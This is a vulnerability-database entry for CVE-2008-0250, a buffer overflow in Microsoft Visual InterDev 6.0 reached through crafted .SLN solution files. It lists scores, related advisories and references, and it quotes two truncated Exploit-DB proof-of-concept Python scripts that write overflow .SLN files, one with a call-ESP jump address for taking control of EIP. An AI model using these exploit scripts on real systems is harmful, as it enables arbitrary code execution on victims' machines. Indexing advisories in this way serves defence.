CVE-2008-0250
published 2008-01-12CVE-2008-0250: Buffer overflow in Microsoft Visual InterDev 6.0 (SP6) allows user-assisted attackers to execute arbitrary code via a Studio Solution (.SLN) file with a long…
PriorityP345critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
16.89%
96.7th percentile
Buffer overflow in Microsoft Visual InterDev 6.0 (SP6) allows user-assisted attackers to execute arbitrary code via a Studio Solution (.SLN) file with a long Project line.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | visual_interdev | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-7h4m-3669-q86j: Buffer overflow in Microsoft Visual InterDev 6
ghsa_unreviewed·2022-05-01·CVSS 9.3
CVE-2008-1709 [CRITICAL] CWE-119 GHSA-7h4m-3669-q86j: Buffer overflow in Microsoft Visual InterDev 6
Buffer overflow in Microsoft Visual InterDev 6.0 (SP6) allows user-assisted attackers to execute arbitrary code via a Studio Solution (.SLN) file with a long malformed Project line beginning with a 'Project("{}") =' sequence, probably a different vector than CVE-2008-0250.
GHSA
GHSA-5gfj-3p52-jpc3: Buffer overflow in Microsoft Visual InterDev 6
ghsa_unreviewed·2022-05-01
CVE-2008-0250 [HIGH] CWE-119 GHSA-5gfj-3p52-jpc3: Buffer overflow in Microsoft Visual InterDev 6
Buffer overflow in Microsoft Visual InterDev 6.0 (SP6) allows user-assisted attackers to execute arbitrary code via a Studio Solution (.SLN) file with a long Project line.
No detection rules found.
Exploit-DB
Microsoft Visual InterDev 6.0 SP6 - '.sln' Local Buffer Overflow (PoC)
exploitdb·2008-04-03
CVE-2008-1709 Microsoft Visual InterDev 6.0 SP6 - '.sln' Local Buffer Overflow (PoC)
Microsoft Visual InterDev 6.0 SP6 - '.sln' Local Buffer Overflow (PoC)
---
#usage: exploit.py FileName
import sys
print "--------------------------------------------------------------------------------"
print ' [PoC 2] Microsoft Visual InterDev 6.0 (SP6) ".sln" files Local Buffer Overflow'
print " author: shinnai"
print " mail: shinnai[at]autistici[dot]org"
print " site: http://shinnai.altervista.org\n"
print " Execution of arbitrary code is possible, but it annoys me at the moment :)"
print "--------------------------------------------------------------------------------"
buff = "a" * 264 + "bbbb" + "c" * 256
try:
sln_file = \
'Microsoft Visual Studio Solution File, Format Version 1.00\n'+\
'Project("{}") = "' + buff + '"\n'+\
'EndProject\n'
out_file = open(sys.argv[1] + ".sln",'w'
Exploit-DB
Microsoft Visual InterDev 6.0 SP6 - '.sln' Local Buffer Overflow
exploitdb·2008-01-11
CVE-2008-1709 Microsoft Visual InterDev 6.0 SP6 - '.sln' Local Buffer Overflow
Microsoft Visual InterDev 6.0 SP6 - '.sln' Local Buffer Overflow
---
#usage: exploit.py FileName
import sys
print "------------------------------------------------------------------------"
print ' Microsoft Visual InterDev 6.0 (SP6) ".sln" files Local Buffer Overflow'
print " author: shinnai"
print " mail: shinnai[at]autistici[dot]org"
print " site: http://shinnai.altervista.org\n"
print " I really have much fun exploiting this one :)"
print " We need to patch five exceptions before we can have EIP:\n"
print " #7C80A268 8801 MOV BYTE PTR DS:[ECX],AL"
print " #ECX 42424242 <-- to patch with jumper 0x7E3FBEFF"
print "------------------------------------------------------------------------"
buff = "A" * 1764
jumper = "\xFF\xBE\x3F\x7E" #call ESP from user32.dll
buff2 = "A" * 4
buff3 =
No writeups or analysis indexed.
http://secunia.com/advisories/28482http://shinnai.altervista.org/exploits/txt/TXT_PoEOrFM8py30PXrDF7IY.htmlhttp://www.securityfocus.com/bid/27250https://exchange.xforce.ibmcloud.com/vulnerabilities/41826https://www.exploit-db.com/exploits/4892http://secunia.com/advisories/28482http://shinnai.altervista.org/exploits/txt/TXT_PoEOrFM8py30PXrDF7IY.htmlhttp://www.securityfocus.com/bid/27250https://exchange.xforce.ibmcloud.com/vulnerabilities/41826https://www.exploit-db.com/exploits/4892
2008-01-12
Published